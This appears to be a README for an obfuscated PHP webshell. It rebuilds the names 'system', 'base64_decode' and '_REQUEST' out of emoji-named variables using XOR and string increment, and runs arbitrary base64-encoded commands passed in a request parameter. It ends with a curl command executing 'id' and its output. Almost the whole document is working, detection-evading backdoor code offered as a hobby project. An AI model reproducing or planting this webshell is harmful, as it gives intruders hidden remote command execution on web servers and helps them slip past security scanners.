php-emoji-webshell

🥸 Nothing new about this webshell, just use same techniques like XOR and self increment operations.

Basically this code

<?php

$a = $_REQUEST[4] ? base64_decode($_REQUEST[4]) : 'whoami';
@system($a);

Turn into emoji, self increment and XOR operations.

<?php

$_=[];                      // $_ = [];
$_=@"$_";                   // $_ = "Array";
$__=("_"=="_")+("_"=="_");  // $__ = 1 + 1;
$_=@$_[++$__];              // $_ = $_[3] // "Array"[3]

$🌏=$_++; // a
$🤮=$_++; // b
$🍪=$_++; // c
$🫣=$_++; // d
$🧁=$_++; // e
$🎂=$_++; // f
$🥃=$_++; // g
$🍔=$_++; // h
$🌘=$_++; // i
$🌗=$_++; // j
$🌖=$_++; // k
$🌕=$_++; // l
$🌒=$_++; // m
$🌓=$_++; // n
$🌔=$_++; // o
$🌰=$_++; // p
$🍘=$_++; // q
$🥗=$_++; // r
$🥥=$_++; // s
$🍑=$_++; // t
$🍋=$_++; // u
$🧇=$_++; // v
$🌮=$_++; // w
$🍕=$_++; // x
$🥯=$_++; // y
$🍣=$_;   // z

$__++; // 4
$__++; // 5
$__++; // 6
$👿=$🤮.$🌏.$🥥.$🧁.$__; // base6
$__--; // 5
$__--; // 4
$👿.=$__.("#"^"|").$🫣.$🧁.$🍪.$🌔.$🫣.$🧁; // base64_decode

$💀=$🥥.$🥯.$🥥.$🍑.$🧁.$🌒; // system
$🥳=("#"^"|").($🍘^"#").($🎂^"#").($🥗^"#").($🧇^"#").($🎂^"#").($🌰^"#").($🌮^"#"); // _REQUEST
$🤯=@${$🥳}[$__] ? $👿(@${$🥳}[$__]) : $🌮.$🍔.$🌔.$🌏.$🌒.$🌘; // $_REQUEST[4] ? base64_decode($_REQUEST[4]) : "whoami"
@$💀($🤯); // @system("command")

Execute the webshell.

❯ curl http://127.0.0.1/emoji.php\?4\=`echo id | base64`
uid=501(someone) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(access_bpf),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)

Im just building this for fun and for the sake of learning new things. ☕️🥯